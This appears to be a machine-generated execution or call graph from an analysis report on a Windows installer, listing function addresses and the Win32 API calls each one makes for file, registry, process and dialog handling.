3463->3464 3466 405b6f WriteFile 3463->3466 3476 40640c 3463->3476 3465 405056 24 API calls 3464->3465 3465->3463 3466->3463 3467->3414 3468->3415 3472 405660 3469->3472 3470 4056ac 3470->3434 3471 405674 MessageBoxIndirectA 3471->3470 3472->3470 3472->3471 3474 405b40 ReadFile 3473->3474 3475 402fcd 3474->3475 3475->3452 3475->3453 3475->3455 3477 406431 3476->3477 3478 406439 3476->3478 3477->3463 3478->3477 3479 4064c0 GlobalFree 3478->3479 3480 4064c9 GlobalAlloc 3478->3480 3481 406540 GlobalAlloc 3478->3481 3482 406537 GlobalFree 3478->3482 3479->3480 3480->3477 3480->3478 3481->3477 3481->3478 3482->3481 3483->3447 4120 401659 4121 402ac1 17 API calls 4120->4121 4122 40165f 4121->4122 4123 406232 2 API calls 4122->4123 4124 401665 4123->4124 4125 401959 4126 402a9f 17 API calls 4125->4126 4127 401960 4126->4127 4128 402a9f 17 API calls 4127->4128 4129 40196d 4128->4129 4130 402ac1 17 API calls 4129->4130 4131 401984 lstrlenA 4130->4131 4133 401994 4131->4133 4132 4019d4 4133->4132 4137 405f2f lstrcpynA 4133->4137 4135 4019c4 4135->4132 4136 4019c9 lstrlenA 4135->4136 4136->4132 4137->4135 4138 401e59 4139 402ac1 17 API calls 4138->4139 4140 401e5f 4139->4140 4141 402ac1 17 API calls 4140->4141 4142 401e68 4141->4142 4143 402ac1 17 API calls 4142->4143 4144 401e71 4143->4144 4145 402ac1 17 API calls 4144->4145 4146 401e7a 4145->4146 4147 401423 24 API calls 4146->4147 4148 401e81 4147->4148 4155 405611 ShellExecuteExA 4148->4155 4150 401ebc 4151 40633c 5 API calls 4150->4151 4153 402716 4150->4153 4152 401ed6 CloseHandle 4151->4152 4152->4153 4155->4150 3484 401edb 3485 402ac1 17 API calls 3484->3485 3486 401ee1 3485->3486 3487 405056 24 API calls 3486->3487 3488 401eeb 3487->3488 3499 4055ce CreateProcessA 3488->3499 3491 402716 3494 401f06 3495 401f14 3494->3495 3496 401f0b 3494->3496 3498 401f12 CloseHandle 3495->3498 3507 405e8d wsprintfA 3496->3507 3498->3491 3500 405601 CloseHandle 3499->3500 3501 401ef1 3499->3501 3500->3501 3501->3491 3501->3498 3502 40633c WaitForSingleObject 3501->3502 3503 406356 3502->3503 3504 406368 GetExitCodeProcess 3503->3504 3508 406303 3503->3508 3504->3494 3507->3498 3509 406320 PeekMessageA 3508->3509 3510 406330 WaitForSingleObject 3509->3510 3511 406316 DispatchMessageA 3509->3511 3510->3503 3511->3509 4163 401f5b 4164 402ac1 17 API calls 4163->4164 4165 401f62 4164->4165 4166 4062c7 5 API calls 4165->4166 4167 401f71 4166->4167 4168 401ff1 4167->4168 4169 401f89 GlobalAlloc 4167->4169 4169->4168 4170 401f9d 4169->4170 4171 4062c7 5 API calls 4170->4171 4172 401fa4 4171->4172 4173 4062c7 5 API calls 4172->4173 4174 401fae 4173->4174 4174->4168 4178 405e8d wsprintfA 4174->4178 4176 401fe5 4179 405e8d wsprintfA 4176->4179 4178->4176 4179->4168 4180 40255b 4181 402ac1 17 API calls 4180->4181 4182 402562 4181->4182 4185 405ac8 GetFileAttributesA CreateFileA 4182->4185 4184 40256e 4185->4184 3865 401b5d 3866 401b6a 3865->3866 3867 401bae 3865->3867 3870 4022ce 3866->3870 3875 401b81 3866->3875 3868 401bb2 3867->3868 3869 401bd7 GlobalAlloc 3867->3869 3880 401bf2 3868->3880 3886 405f2f lstrcpynA 3868->3886 3871 405f51 17 API calls 3869->3871 3872 405f51 17 API calls 3870->3872 3871->3880 3874 4022db 3872->3874 3878 40564b MessageBoxIndirectA 3874->3878 3884 405f2f lstrcpynA 3875->3884 3876 401bc4 GlobalFree 3876->3880 3878->3880 3879 401b90 3885 405f2f lstrcpynA 3879->3885 3882 401b9f 3887 405f2f lstrcpynA 3882->3887 3884->3879 3885->3882 3886->3876 3887->3880 4186 401a5e 4187 402a9f 17 API calls 4186->4187 4188 401a64 4187->4188 4189 402a9f 17 API calls 4188->4189 4190 401a0e 4189->4190 4191 4024df 4201 402b01 4191->4201 4194 402a9f 17 API calls 4195 4024f2 4194->4195 4196 402519 RegEnumValueA 4195->4196 4197 40250d RegEnumKeyA 4195->4197 4199 402716 4195->4199 4198 40252e RegCloseKey 4196->4198 4197->4198 4198->4199 4202 402ac1 17 API calls 4201->4202 4203 402b18 4202->4203 4204 405db5 RegOpenKeyExA 4203->4204 4205 4024e9 4204->4205 4205->4194 4206 404460 4207 40448c 4206->4207 4208 40449d 4206->4208 4267 40562f GetDlgItemTextA 4207->4267 4210 4044a9 GetDlgItem 4208->4210 4217 404508 4208->4217 4212 4044bd 4210->4212 4211 404497 4214 406199 5 API calls 4211->4214 4215 4044d1 SetWindowTextA 4212->4215 4220 405960 4 API calls 4212->4220 4213 4045ec 4216 404796 4213->4216 4269 40562f GetDlgItemTextA 4213->4269 4214->4208 4221 403ff0 18 API calls 4215->4221 4219 404057 8 API calls 4216->4219 4217->4213 4217->4216 4222 405f51 17 API calls 4217->4222 4224 4047aa 4219->4224 4225 4044c7 4220->4225 4226 4044ed 4221->4226 4227 40457c SHBrowseForFolderA 4222->4227 4223 40461c 4228 4059b5 18 API calls 4223->4228 4225->4215 4234 4058c7 3 API calls 4225->4234 4229 403ff0 18 API calls 4226->4229 4227->4213 4230 404594 CoTaskMemFree 4227->4230 4231 404622 4228->4231 4232 4044fb 4229->4232 4233 4058c7 3 API calls 4230->4233 4270 405f2f lstrcpynA 4231->4270 4268 404025 SendMessageA 4232->4268 4236 4045a1 4233->4236 4234->4215 4239 4045d8 SetDlgItemTextA 4236->4239 4243 405f51 17 API calls 4236->4243 4238 404501 4241 4062c7 5 API calls 4238->4241 4239->4213 4240 404639 4242 4062c7 5 API calls 4240->4242 4241->4217 4250 404640 4242->4250 4244 4045c0 lstrcmpiA 4243->4244 4244->4239 4247 4045d1 lstrcatA 4244->4247 4245 40467c 4271 405f2f lstrcpynA 4245->4271 4247->4239 4248 404683 4249 405960 4 API calls 4248->4249 4251 404689 GetDiskFreeSpaceA 4249->4251 4250->4245 4254 40590e 2 API calls 4250->4254 4256 4046d4 4250->4256 4253 4046ad MulDiv 4251->4253 4251->4256 4253->4256 4254->4250 4255 404745 4258 404768 4255->4258 4260 40140b 2 API calls 4255->4260 4256->4255 4257 4048dc 20 API calls 4256->4257 4259 404732 4257->4259 4272 404012 KiUserCallbackDispatcher 4258->4272 4261 404747 SetDlgItemTextA 4259->4261 4262 404737 4259->4262 4260->4258 4261->4255 4265 404817 20 API calls 4262->4265 4264 404784 4264->4216 4273 4043b9 4264->4273 4265->4255 4267->4211 4268->4238 4269->4223 4270->4240 4271->4248 4272->4264 4274 4043c7 4273->4274 4275 4043cc SendMessageA 4273->4275 4274->4275 4275->4216 4276 402c61 4277 402c70 SetTimer 4276->4277 4278 402c89 4276->4278 4277->4278 4279 402cde 4278->4279 4280 402ca3 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4278->4280 4280->4279 4281 401563 4282 4028f9 4281->4282 4285 405e8d wsprintfA 4282->4285 4284 4028fe 4285->4284 4286 40166a 4287 402ac1 17 API calls 4286->4287 4288 401671 4287->4288 4289 402ac1 17 API calls 4288->4289 4290 40167a 4289->4290 4291 402ac1 17 API calls 4290->4291 4292 401683 MoveFileA 4291->4292 4293 401696 4292->4293 4299 40168f 4292->4299 4295 40223c 4293->4295 4296 406232 2 API calls 4293->4296 4294 401423 24 API calls 4294->4295 4297 4016a5 4296->4297 4297->4295 4298 405d0e 36 API calls 4297->4298 4298->4299 4299->4294 4300 40246d 4301 402b01 17 API calls 4300->4301 4302 402477 4301->4302 4303 402ac1 17 API calls 4302->4303 4304 402480 4303->4304 4305 40248a RegQueryValueExA 4304->4305 4309 402716 4304->4309 4306 4024aa 4305->4306 4310 4024b0 RegCloseKey 4305->4310 4306->4310 4311 405e8d wsprintfA 4306->4311 4310->4309 4311->4310 4312 4019ed 4313 402ac1 17 API calls 4312->4313 4314 4019f4 4313->4314 4315 402ac1 17 API calls 4314->4315 4316 4019fd 4315->4316 4317 401a04 lstrcmpiA 4316->4317 4318 401a16 lstrcmpA 4316->4318 4319 401a0a 4317->4319 4318->4319 4320 40156f 4321 401586 4320->4321 4322 40157f ShowWindow 4320->4322 4323 402951 4321->4323 4324 401594 ShowWindow 4321->4324 4322->4321 4324->4323 4339 4014f4 SetForegroundWindow 4340 402951 4339->4340 4341 401cf5 4342 402a9f 17 API calls 4341->4342 4343 401cfc 4342->4343 4344 402a9f 17 API calls 4343->4344 4345 401d08 GetDlgItem 4344->4345 4346 402577 4345->4346 4347 4022f6 4348 402304 4347->4348 4349 4022fe 4347->4349 4351 402314 4348->4351 4352 402ac1 17 API calls 4348->4352 4350 402ac1 17 API calls 4349->4350 4350->4348 4353 402322 4351->4353 4354 402ac1 17 API calls 4351->4354 4352->4351 4355 402ac1 17 API calls 4353->4355 4354->4353 4356 40232b WritePrivateProfileStringA 4355->4356 4364 4026f8 4365 402ac1 17 API calls 4364->4365 4366 4026ff FindFirstFileA 4365->4366 4367 402722 4366->4367 4371 402712 4366->4371 4368 402729 4367->4368 4372 405e8d wsprintfA 4367->4372 4373 405f2f lstrcpynA 4368->4373 4372->4368 4373->4371 4374 40237b 4375 402382 4374->4375 4376 4023ad 4374->4376 4377 402b01 17 API calls 4375->4377 4378 402ac1 17 API calls 4376->4378 4381 402389 4377->4381 4379 4023b4 4378->4379 4385 402b7f 4379->4385 4382 4023c1 4381->4382 4383 402ac1 17 API calls 4381->4383 4384 40239a RegDeleteValueA RegCloseKey 4383->4384 4384->4382 4386 402b95 4385->4386 4387 402bab 4386->4387 4389 402bb4 4386->4389 4387->4382 4390 405db5 RegOpenKeyExA 4389->4390 4396 402be2 4390->4396 4391 402c33 4391->4387 4392 402c08 RegEnumKeyA 4393 402c1f RegCloseKey 4392->4393 4392->4396 4394 4062c7 5 API calls 4393->4394 4397 402c2f 4394->4397 4395 402c40 RegCloseKey 4395->4391 4396->4391 4396->4392 4396->4393 4396->4395 4398 402bb4 6 API calls 4396->4398 4397->4391 4399 402c4e RegDeleteKeyA 4397->4399 4398->4396 4399->4391 3888 401ffd 3889 40200f 3888->3889 3898 4020bd 3888->3898 3890 402ac1 17 API calls 3889->3890 3892 402016 3890->3892 3891 401423 24 API calls 3899 40223c 3891->3899 3893 402ac1 17 API calls 3892->3893 3894 40201f 3893->3894 3895 402034 LoadLibraryExA 3894->3895 3896 402027 GetModuleHandleA 3894->3896 3897 402044 GetProcAddress 3895->3897 3895->3898 3896->3895 3896->3897 3900 402090 3897->3900 3901 402053 3897->3901 3898->3891 3902 405056 24 API calls 3900->3902 3903 401423 24 API calls 3901->3903 3904 402063 3901->3904 3902->3904 3903->3904 3904->3899 3905 4020b1 FreeLibrary 3904->3905 3905->3899 4400 40257d 4401 402582 4400->4401 4402 402596 4400->4402 4403 402a9f 17 API calls 4401->4403 4404 402ac1 17 API calls 4402->4404 4406 40258b 4403->4406 4405 40259d lstrlenA 4404->4405 4405->4406 4407 405b6f WriteFile 4406->4407 4408 4025bf 4406->4408 4407->4408 4409 4018fd 4410 401934 4409->4410 4411 402ac1 17 API calls 4410->4411 4412 401939 4411->4412 4413 4056f7 67 API calls 4412->4413 4414 401942 4413->4414 4415 401000 4416 401037 BeginPaint GetClientRect 4415->4416 4417 40100c DefWindowProcA 4415->4417 4418 4010f3 4416->4418 4420 401179 4417->4420 4421 401073 CreateBrushIndirect FillRect DeleteObject 4418->4421 4422 4010fc 4418->4422 4421->4418 4423 401102 CreateFontIndirectA 4422->4423 4424 401167 EndPaint 4422->4424 4423->4424 4425 401112 6 API calls 4423->4425 4424->4420 4425->4424 4426 401900 4427 402ac1 17 API calls 4426->4427 4428 401907 4427->4428 4429 40564b MessageBoxIndirectA 4428->4429 4430 401910 4429->4430 4431 401502 4432 40150a 4431->4432 4434 40151d 4431->4434 4433 402a9f 17 API calls 4432->4433 4433->4434 4435 402682 4436 402689 4435->4436 4439 4028fe 4435->4439 4437 402a9f 17 API calls 4436->4437 4438 402690 4437->4438 4440 40269f SetFilePointer 4438->4440 4440->4439 4441 4026af 4440->4441 4443 405e8d wsprintfA 4441->4443 4443->4439 4444 404104 lstrcpynA lstrlenA 4445 401c04 4446 402a9f 17 API calls 4445->4446 4447 401c0b 4446->4447 4448 402a9f 17 API calls 4447->4448 4449 401c18 4448->4449 4450 402ac1 17 API calls 4449->4450 4453 401c2d 4449->4453 4450->4453 4451 401c94 4456 402ac1 17 API calls 4451->4456 4452 401c48 4455 402a9f 17 API calls 4452->4455 4454 402ac1 17 API calls 4453->4454 4457 401c3d 4453->4457 4454->4457 4458 401c4d 4455->4458 4459 401c99 4456->4459 4457->4451 4457->4452 4460 402a9f 17 API calls 4458->4460 4461 402ac1 17 API calls 4459->4461 4462 401c59 4460->4462 4463 401ca2 FindWindowExA 4461->4463 4464 401c84 SendMessageA 4462->4464 4465 401c66 SendMessageTimeoutA 4462->4465 4466 401cc0 4463->4466 4464->4466 4465->4466 4474 401490 4475 405056 24 API calls 4474->4475 4476 401497 4475->4476 3122 405611 ShellExecuteExA 3315 405194 3316 4051b6 GetDlgItem GetDlgItem GetDlgItem 3315->3316 3317 40533f 3315->3317 3360 404025 SendMessageA 3316->3360 3319 405347 GetDlgItem CreateThread CloseHandle 3317->3319 3320 40536f 3317->3320 3319->3320 3383 405128 OleInitialize 3319->3383 3322 40539d 3320->3322 3323 405385 ShowWindow ShowWindow 3320->3323 3324 4053be 3320->3324 3321 405226 3326 40522d GetClientRect GetSystemMetrics SendMessageA SendMessageA 3321->3326 3325 4053f8 3322->3325 3328 4053d1 ShowWindow 3322->3328 3329 4053ad 3322->3329 3365 404025 SendMessageA 3323->3365 3369 404057 3324->3369 3325->3324 3335 405405 SendMessageA 3325->3335 3333 40529b 3326->3333 3334 40527f SendMessageA SendMessageA 3326->3334 3331 4053f1 3328->3331 3332 4053e3 3328->3332 3366 403fc9 3329->3366 3339 403fc9 SendMessageA 3331->3339 3338 405056 24 API calls 3332->3338 3340 4052a0 SendMessageA 3333->3340 3341 4052ae 3333->3341 3334->3333 3337 4053ca 3335->3337 3342 40541e CreatePopupMenu 3335->3342 3338->3331 3339->3325 3340->3341 3361 403ff0 3341->3361 3343 405f51 17 API calls 3342->3343 3345 40542e AppendMenuA 3343->3345 3347 40544c GetWindowRect 3345->3347 3348 40545f TrackPopupMenu 3345->3348 3346 4052be 3349 4052c7 ShowWindow 3346->3349 3350 4052fb GetDlgItem SendMessageA 3346->3350 3347->3348 3348->3337 3352 40547b 3348->3352 3353 4052ea 3349->3353 3354 4052dd ShowWindow 3349->3354 3350->3337 3351 405322 SendMessageA SendMessageA 3350->3351 3351->3337 3355 40549a SendMessageA 3352->3355 3364 404025 SendMessageA 3353->3364 3354->3353 3355->3355 3356 4054b7 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3355->3356 3358 4054d9 SendMessageA 3356->3358 3358->3358 3359 4054fb GlobalUnlock SetClipboardData CloseClipboard 3358->3359 3359->3337 3360->3321 3362 405f51 17 API calls 3361->3362 3363 403ffb SetDlgItemTextA 3362->3363 3363->3346 3364->3350 3365->3322 3367 403fd0 3366->3367 3368 403fd6 SendMessageA 3366->3368 3367->3368 3368->3324 3370 40406f GetWindowLongA 3369->3370 3380 4040f8 3369->3380 3371 404080 3370->3371 3370->3380 3372 404092 3371->3372 3373 40408f GetSysColor 3371->3373 3374 4040a2 SetBkMode 3372->3374 3375 404098 SetTextColor 3372->3375 3373->3372 3376 4040c0 3374->3376 3377 4040ba GetSysColor 3374->3377 3375->3374 3378 4040d1 3376->3378 3379 4040c7 SetBkColor 3376->3379 3377->3376 3378->3380 3381 4040e4 DeleteObject 3378->3381 3382 4040eb CreateBrushIndirect 3378->3382 3379->3378 3380->3337 3381->3382 3382->3380 3390 40403c 3383->3390 3385 40403c SendMessageA 3387 405184 OleUninitialize 3385->3387 3386 40514b 3389 405172 3386->3389 3393 401389 3386->3393 3389->3385 3391 404054 3390->3391 3392 404045 SendMessageA 3390->3392 3391->3386 3392->3391 3394 401390 3393->3394 3395 4013fe 3394->3395 3396 4013cb MulDiv SendMessageA 3394->3396 3395->3386 3396->3394 4477 401d95 GetDC 4478 402a9f 17 API calls 4477->4478 4479 401da7 GetDeviceCaps MulDiv ReleaseDC 4478->4479 4480 402a9f 17 API calls 4479->4480 4481 401dd8 4480->4481 4482 405f51 17 API calls 4481->4482 4483 401e15 CreateFontIndirectA 4482->4483 4484 402577 4483->4484 4485 404419 4486 404429 4485->4486 4487 40444f 4485->4487 4489 403ff0 18 API calls 4486->4489 4488 404057 8 API calls 4487->4488 4490 40445b 4488->4490 4491 404436 SetDlgItemTextA 4489->4491 4491->4487 4492 401d1a 4493 402a9f 17 API calls 4492->4493 4494 401d28 SetWindowLongA 4493->4494 4495 402951 4494->4495 3791 403b1c 3792 403b34 3791->3792 3793 403c6f 3791->3793 3792->3793 3794 403b40 3792->3794 3795 403c80 GetDlgItem GetDlgItem 3793->3795 3796 403cc0 3793->3796 3798 403b4b SetWindowPos 3794->3798 3799 403b5e 3794->3799 3800 403ff0 18 API calls 3795->3800 3797 403d1a 3796->3797 3805 401389 2 API calls 3796->3805 3801 40403c SendMessageA 3797->3801 3822 403c6a 3797->3822 3798->3799 3802 403b63 ShowWindow 3799->3802 3803 403b7b 3799->3803 3804 403caa SetClassLongA 3800->3804 3830 403d2c 3801->3830 3802->3803 3806 403b83 DestroyWindow 3803->3806 3807 403b9d 3803->3807 3808 40140b 2 API calls 3804->3808 3809 403cf2 3805->3809 3861 403f79 3806->3861 3810 403ba2 SetWindowLongA 3807->3810 3811 403bb3 3807->3811 3808->3796 3809->3797 3814 403cf6 SendMessageA 3809->3814 3810->3822 3812 403c5c 3811->3812 3813 403bbf GetDlgItem 3811->3813 3819 404057 8 API calls 3812->3819 3817 403bd2 SendMessageA IsWindowEnabled 3813->3817 3818 403bef 3813->3818 3814->3822 3815 40140b 2 API calls 3815->3830 3816 403f7b DestroyWindow EndDialog 3816->3861 3817->3818 3817->3822 3821 403bf4 3818->3821 3824 403bfc 3818->3824 3826 403c43 SendMessageA 3818->3826 3827 403c0f 3818->3827 3819->3822 3820 403faa ShowWindow 3820->3822 3828 403fc9 SendMessageA 3821->3828 3823 405f51 17 API calls 3823->3830 3824->3821 3824->3826 3825 403ff0 18 API calls 3825->3830 3826->3812 3831 403c17 3827->3831 3832 403c2c 3827->3832 3829 403c2a 3828->3829 3829->3812 3830->3815 3830->3816 3830->3822 3830->3823 3830->3825 3836 403ff0 18 API calls 3830->3836 3852 403ebb DestroyWindow 3830->3852 3834 40140b 2 API calls 3831->3834 3833 40140b 2 API calls 3832->3833 3835 403c33 3833->3835 3834->3821 3835->3812 3835->3821 3837 403da7 GetDlgItem 3836->3837 3838 403dc4 ShowWindow KiUserCallbackDispatcher 3837->3838 3839 403dbc 3837->3839 3862 404012 KiUserCallbackDispatcher 3838->3862 3839->3838 3841 403dee EnableWindow 3846 403e02 3841->3846 3842 403e07 GetSystemMenu EnableMenuItem SendMessageA 3843 403e37 SendMessageA 3842->3843 3842->3846 3843->3846 3845 403afd 18 API calls 3845->3846 3846->3842 3846->3845 3863 404025 SendMessageA 3846->3863 3864 405f2f lstrcpynA 3846->3864 3848 403e66 lstrlenA 3849 405f51 17 API calls 3848->3849 3850 403e77 SetWindowTextA 3849->3850 3851 401389 2 API calls 3850->3851 3851->3830 3853 403ed5 CreateDialogParamA 3852->3853 3852->3861 3854 403f08 3853->3854 3853->3861 3855 403ff0 18 API calls 3854->3855 3856 403f13 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3855->3856 3857 401389 2 API calls 3856->3857 3858 403f59 3857->3858 3858->3822 3859 403f61 ShowWindow 3858->3859 3860 40403c SendMessageA 3859->3860 3860->3861 3861->3820 3861->3822 3862->3841 3863->3846 3864->3848 3906 40159d 3907 402ac1 17 API calls 3906->3907 3908 4015a4 SetFileAttributesA 3907->3908 3909 4015b6 3908->3909 4501 40149d 4502 4014ab PostQuitMessage 4501->4502 4503 4022e1 4501->4503 4502->4503 4504 401a1e 4505 402ac1 17 API calls 4504->4505 4506 401a27 ExpandEnvironmentStringsA 4505->4506 4507 401a3b 4506->4507 4509 401a4e 4506->4509 4508 401a40 lstrcmpA 4507->4508 4507->4509 4508->4509 4510 40171f 4511 402ac1 17 API calls 4510->4511 4512 401726 SearchPathA 4511->4512 4513 401741 4512->4513 4521 401e25 4522 402a9f 17 API calls 4521->4522 4523 401e2b 4522->4523 4524 402a9f 17 API calls 4523->4524 4525 401e37 4524->4525 4526 401e43 ShowWindow 4525->4526 4527 401e4e EnableWindow 4525->4527 4528 402951 4526->4528 4527->4528 4529 401f2b 4530 402ac1 17 API calls 4529->4530 4531 401f32 4530->4531 4532 406232 2 API calls 4531->4532 4533 401f38 4532->4533 4535 401f4a 4533->4535 4536 405e8d wsprintfA 4533->4536 4536->4535 4537 40292c SendMessageA 4538 402946 InvalidateRect 4537->4538 4539 402951 4537->4539 4538->4539 4547 4047b1 4548 4047c1 4547->4548 4549 4047dd 4547->4549 4558 40562f GetDlgItemTextA 4548->4558 4550 404810 4549->4550 4551 4047e3 SHGetPathFromIDListA 4549->4551 4553 4047fa SendMessageA 4551->4553 4554 4047f3 4551->4554 4553->4550 4556 40140b 2 API calls 4554->4556 4555 4047ce SendMessageA 4555->4549 4556->4553 4558->4555 3123 401932 3124 401934 3123->3124 3129 402ac1 3124->3129 3130 402acd 3129->3130 3176 405f51 3130->3176 3133 401939 3135 4056f7 3133->3135 3218 4059b5 3135->3218 3138 405736 3141 40586e 3138->3141 3232 405f2f lstrcpynA 3138->3232 3139 40571f DeleteFileA 3140 401942 3139->3140 3141->3140 3261 406232 FindFirstFileA 3141->3261 3143 40575c 3144 405762 lstrcatA 3143->3144 3145 40576f 3143->3145 3146 405775 3144->3146 3233 40590e lstrlenA 3145->3233 3149 405783 lstrcatA 3146->3149 3150 40577a 3146->3150 3152 40578e lstrlenA FindFirstFileA 3149->3152 3150->3149 3150->3152 3154 405864 3152->3154 3167 4057b2 3152->3167 3153 40588c 3264 4058c7 lstrlenA CharPrevA 3153->3264 3154->3141 3156 4058f2 CharNextA 3156->3167 3158 4056af 5 API calls 3159 40589e 3158->3159 3160 4058a2 3159->3160 3161 4058b8 3159->3161 3160->3140 3165 405056 24 API calls 3160->3165 3163 405056 24 API calls 3161->3163 3163->3140 3164 405843 FindNextFileA 3166 40585b FindClose 3164->3166 3164->3167 3168 4058af 3165->3168 3166->3154 3167->3156 3167->3164 3171 4056f7 60 API calls 3167->3171 3173 405056 24 API calls 3167->3173 3237 405f2f lstrcpynA 3167->3237 3238 4056af 3167->3238 3246 405056 3167->3246 3257 405d0e MoveFileExA 3167->3257 3169 405d0e 36 API calls 3168->3169 3172 4058b6 3169->3172 3171->3167 3172->3140 3173->3164 3184 405f5e 3176->3184 3177 406180 3178 402aee 3177->3178 3209 405f2f lstrcpynA 3177->3209 3178->3133 3193 406199 3178->3193 3180 40615a lstrlenA 3180->3184 3183 405f51 10 API calls 3183->3180 3184->3177 3184->3180 3184->3183 3185 406076 GetSystemDirectoryA 3184->3185 3187 406089 GetWindowsDirectoryA 3184->3187 3188 406199 5 API calls 3184->3188 3189 406103 lstrcatA 3184->3189 3190 4060bd SHGetSpecialFolderLocation 3184->3190 3191 405f51 10 API calls 3184->3191 3202 405e16 3184->3202 3207 405e8d wsprintfA 3184->3207 3208 405f2f lstrcpynA 3184->3208 3185->3184 3187->3184 3188->3184 3189->3184 3190->3184 3192 4060d5 SHGetPathFromIDListA CoTaskMemFree 3190->3192 3191->3184 3192->3184 3200 4061a5 3193->3200 3194 40620d 3195 406211 CharPrevA 3194->3195 3197 40622c 3194->3197 3195->3194 3196 406202 CharNextA 3196->3194 3196->3200 3197->3133 3199 4061f0 CharNextA 3199->3200 3200->3194 3200->3196 3200->3199 3201 4061fd CharNextA 3200->3201 3214 4058f2 3200->3214 3201->3196 3210 405db5 3202->3210 3205 405e4a RegQueryValueExA RegCloseKey 3206 405e79 3205->3206 3206->3184 3207->3184 3208->3184 3209->3178 3211 405dc4 3210->3211 3212 405dc8 3211->3212 3213 405dcd RegOpenKeyExA 3211->3213 3212->3205 3212->3206 3213->3212 3215 4058f8 3214->3215 3216 40590b 3215->3216 3217 4058fe CharNextA 3215->3217 3216->3200 3217->3215 3267 405f2f lstrcpynA 3218->3267 3220 4059c6 3268 405960 CharNextA CharNextA 3220->3268 3222 405717 3222->3138 3222->3139 3224 406199 5 API calls 3230 4059dc 3224->3230 3225 405a07 lstrlenA 3226 405a12 3225->3226 3225->3230 3228 4058c7 3 API calls 3226->3228 3227 406232 2 API calls 3227->3230 3229 405a17 GetFileAttributesA 3228->3229 3229->3222 3230->3222 3230->3225 3230->3227 3231 40590e 2 API calls 3230->3231 3231->3225 3232->3143 3234 40591b 3233->3234 3235 405920 CharPrevA 3234->3235 3236 40592c 3234->3236 3235->3234 3235->3236 3236->3146 3237->3167 3274 405aa3 GetFileAttributesA 3238->3274 3241 4056dc 3241->3167 3242 4056d2 DeleteFileA 3244 4056d8 3242->3244 3243 4056ca RemoveDirectoryA 3243->3244 3244->3241 3245 4056e8 SetFileAttributesA 3244->3245 3245->3241 3247 405071 3246->3247 3256 405114 3246->3256 3248 40508e lstrlenA 3247->3248 3249 405f51 17 API calls 3247->3249 3250 4050b7 3248->3250 3251 40509c lstrlenA 3248->3251 3249->3248 3253 4050ca 3250->3253 3254 4050bd SetWindowTextA 3250->3254 3252 4050ae lstrcatA 3251->3252 3251->3256 3252->3250 3255 4050d0 SendMessageA SendMessageA SendMessageA 3253->3255 3253->3256 3254->3253 3255->3256 3256->3167 3258 405d2f 3257->3258 3259 405d22 3257->3259 3258->3167 3277 405b9e 3259->3277 3262 405888 3261->3262 3263 406248 FindClose 3261->3263 3262->3140 3262->3153 3263->3262 3265 4058e1 lstrcatA 3264->3265 3266 405892 3264->3266 3265->3266 3266->3158 3267->3220 3269 40597b 3268->3269 3272 40598b 3268->3272 3271 405986 CharNextA 3269->3271 3269->3272 3270 4059ab 3270->3222 3270->3224 3271->3270 3272->3270 3273 4058f2 CharNextA 3272->3273 3273->3272 3275 4056bb 3274->3275 3276 405ab5 SetFileAttributesA 3274->3276 3275->3241 3275->3242 3275->3243 3276->3275 3278 405bc4 3277->3278 3279 405bea GetShortPathNameA 3277->3279 3304 405ac8 GetFileAttributesA CreateFileA 3278->3304 3281 405d09 3279->3281 3282 405bff 3279->3282 3281->3258 3282->3281 3284 405c07 wsprintfA 3282->3284 3283 405bce CloseHandle GetShortPathNameA 3283->3281 3285 405be2 3283->3285 3286 405f51 17 API calls 3284->3286 3285->3279 3285->3281 3287 405c2f 3286->3287 3305 405ac8 GetFileAttributesA CreateFileA 3287->3305 3289 405c3c 3289->3281 3290 405c4b GetFileSize GlobalAlloc 3289->3290 3291 405d02 CloseHandle 3290->3291 3292 405c6d 3290->3292 3291->3281 3306 405b40 ReadFile 3292->3306 3297 405ca0 3299 405a2d 4 API calls 3297->3299 3298 405c8c lstrcpyA 3300 405cae 3298->3300 3299->3300 3301 405ce5 SetFilePointer 3300->3301 3313 405b6f WriteFile 3301->3313 3304->3283 3305->3289 3307 405b5e 3306->3307 3307->3291 3308 405a2d lstrlenA 3307->3308 3309 405a6e lstrlenA 3308->3309 3310 405a76 3309->3310 3311 405a47 lstrcmpiA 3309->3311 3310->3297 3310->3298 3311->3310 3312 405a65 CharNextA 3311->3312 3312->3309 3314 405b8d GlobalFree 3313->3314 3314->3291 4559 4026b4 4560 4026ba 4559->4560 4561 402951 4560->4561 4562 4026c2 FindClose 4560->4562 4562->4561 4563 402736 4564 402ac1 17 API calls 4563->4564 4565 402744 4564->4565 4566 40275a 4565->4566 4567 402ac1 17 API calls 4565->4567 4568 405aa3 2 API calls 4566->4568 4567->4566 4569 402760 4568->4569 4591 405ac8 GetFileAttributesA CreateFileA 4569->4591 4571 40276d 4572 402816 4571->4572 4573 402779 GlobalAlloc 4571->4573 4576 402831 4572->4576 4577 40281e DeleteFileA 4572->4577 4574 402792 4573->4574 4575 40280d CloseHandle 4573->4575 4592 403173 SetFilePointer 4574->4592 4575->4572 4577->4576 4579 402798 4580 40315d ReadFile 4579->4580 4581 4027a1 GlobalAlloc 4580->4581 4582 4027b1 4581->4582 4583 4027eb 4581->4583 4585 402f81 35 API calls 4582->4585 4584 405b6f WriteFile 4583->4584 4586 4027f7 GlobalFree 4584->4586 4590 4027be 4585->4590 4587 402f81 35 API calls 4586->4587 4588 40280a 4587->4588 4588->4575 4589 4027e2 GlobalFree 4589->4583 4590->4589 4591->4571 4592->4579 4593 402837 4594 402a9f 17 API calls 4593->4594 4595 40283d 4594->4595 4596 402865 4595->4596 4597 40287c 4595->4597 4604 402716 4595->4604 4600 402879 4596->4600 4601 40286a 4596->4601 4598 402896 4597->4598 4599 402886 4597->4599 4603 405f51 17 API calls 4598->4603 4602 402a9f 17 API calls 4599->4602 4608 405e8d wsprintfA 4600->4608 4607 405f2f lstrcpynA 4601->4607 4602->4604 4603->4604 4607->4604 4608->4604 4609 4014b7 4610 4014bd 4609->4610 4611 401389 2 API calls 4610->4611 4612 4014c5 4611->4612 4613 404139 4614 40414f 4613->4614 4619 40425b 4613->4619 4617 403ff0 18 API calls 4614->4617 4615 4042ca 4616 404394 4615->4616 4618 4042d4 GetDlgItem 4615->4618 4625 404057 8 API calls 4616->4625 4620 4041a5 4617->4620 4621 404352 4618->4621 4622 4042ea 4618->4622 4619->4615 4619->4616 4623 40429f GetDlgItem SendMessageA 4619->4623 4624 403ff0 18 API calls 4620->4624 4621->4616 4630 404364 4621->4630 4622->4621 4629 404310 